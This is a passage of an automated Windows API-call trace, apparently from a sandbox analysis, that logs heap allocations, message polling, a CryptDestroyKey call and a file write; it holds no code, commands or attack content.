hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0241.725] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.725] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0241.726] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0241.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ea91a0 [0241.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ed2010 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea91a0 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ea91a0 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed2010 | out: hHeap=0x970000) returned 1 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ed2010 [0241.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea91a0 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94a68 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0241.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0241.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0241.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0241.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebd8d8 | out: hHeap=0x970000) returned 1 [0241.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28f50 | out: hHeap=0x970000) returned 1 [0241.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ee6748 [0241.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed2010 | out: hHeap=0x970000) returned 1 [0241.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0241.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2f14818 [0241.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.804] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x14730, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x14730, lpOverlapped=0x0) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0241.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0241.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0241.809] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0241.809] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.810] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51040, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0241.811] CryptDestroyKey (hKey=0xa87250) returned 1 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0241.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree 